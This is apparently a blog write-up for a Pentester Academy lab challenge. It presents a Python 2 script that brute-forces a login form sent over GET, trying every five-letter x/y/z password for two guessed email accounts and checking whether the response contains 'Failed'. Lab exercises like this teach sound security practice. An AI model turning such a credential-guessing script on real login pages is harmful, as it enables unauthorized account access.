Pentester Academy GET Method Challenge 1 via Python



The Challenge 1 for Pentester Academy uses GET method for sending over the credentials. So the username and password go like:

Also one big hint dropped here is that the domain is PentesterAcademy.com. So the email addresses would look like admin@PentesterAcademy.com and jack@PentesterAacademy.com.
I reused the code for generating all combinations of x, y and z from my previous blog post aimed at challenge 3. We just need to update the URL with the username and the password while sending the request for each combination.

But how do we verify if the credentials have been accepted as valid or rejected? The webpage says “Failed! Please try again!” if the credentials are rejected. So we can search for the string “Failed” in the response to check if the credentials were accepted.

The complete solutions looks as follows:
import urllib2
import sys
def fun(a):
    chars="xyz"
    l = len(a)
    lenthPerWord = len(a[0])
    if lenthPerWord == 5:
        return a
    c=[]
    for i in range(0,l):
        for j in chars:
            c.append(j+a[i])
    return fun(c)
c=['x','y','z']
listOfPass=fun(c)

for user in ["admin","jack"]:
    for password in listOfPass:
        url = ("http://pentesteracademylab.appspot.com/lab/webapp/1?email=%s&password=%s") %(user+"@PentesterAcademy.com",password)
        r=urllib2.Request(url)
        handle=urllib2.urlopen(r)
       
        response = handle.read()
        handle.close()
        if not "Failed" in str(response):
            print "Succeeded for "+user+":"+password
            print str(response)
            sys.exit(1)
        else:
            print "Failed for "+user+":"+password

Comments

Popular posts from this blog

Disable Low and Medium Strength Cipher for Java Applications

Pentester Academy Basic Authentication Challenge 3 via Python